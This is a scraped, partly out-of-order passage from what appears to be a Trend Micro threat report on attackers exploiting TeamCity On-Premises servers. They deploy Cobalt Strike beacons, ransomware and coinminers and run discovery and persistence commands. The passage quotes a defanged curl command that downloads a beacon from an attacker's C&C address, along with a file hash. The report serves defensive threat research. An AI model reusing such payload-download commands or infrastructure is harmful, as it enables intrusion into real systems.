<\/p>\n
![](\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/24\/teamcity-cover.png\")
<\/div>\nExecuting domain discovery and persistence commands<\/span><\/p>\n Aside from malware deployment, we have also seen several attempts to discover network infrastructure and employ persistence commands arising from the java.exe<\/i> process under a vulnerable TeamCity server directory.<\/p>\n Parent Process:<\/b> We observed the following subject processes being used for discovery and persistence tactics:<\/p>\n Several of these commands involve attempts to manipulate user accounts, groups, and permissions, which are typical actions taken by attackers seeking to gain unauthorized access to a system. The attempt to add a user to the local Administrators group is particularly concerning, since it could grant elevated privileges to attackers and help them establish a foothold in the system that can be used to maintain access over an extended period.<\/p>\n Deploying Cobalt Strike beacons The beacon was downloaded using the command curl hxxp:\/\/83[.]97[.]20[.]141:81\/beacon.out -o .conf<\/i> and was saved in the path C:\\TeamCity\\bin\\.conf<\/i>.<\/p>\n This was detected by the Trend Pattern Backdoor.Linux.COBEACON.SMYXDKV<\/b>. The beacon reaches out to the C&C server 83[.]97[.]20[.]141, which we have already proactively detected as of this writing.<\/p>\n The active exploitation of vulnerabilities within TeamCity On-Premises represents a critical threat to organizations relying on this platform for their CI\/CD processes. Our telemetry has revealed that threat actors are exploiting these vulnerabilities to deploy ransomware, coinminers, and backdoor payloads on compromised TeamCity servers.<\/p>\n This malicious activity not only jeopardizes the confidentiality, integrity, and availability of sensitive data and critical systems but also imposes financial and operational risks for affected organizations. Swift action is imperative to mitigate these vulnerabilities and prevent further damage from ransomware extortion and other types of malware.<\/p>\n The following protections exist to detect malicious activity and shield Trend customers against the exploitation of the TeamCity On-Premises vulnerabilities discussed in this entry.<\/p>\n
C:\\TeamCity\\jre\\bin\\java.exe<\/span><\/p>\n\n
<\/span>
Finally, we found threat actors deploying Cobeacon to vulnerable TeamCity servers. In one of the environments with a vulnerable TeamCity server, we found that a beacon (SHA1: db6bd96b152314db3c430df41b83fcf2e5712281<\/i>) was deployed.<\/p>\nConclusion<\/span><\/h2>\n
<\/span><\/h2>\n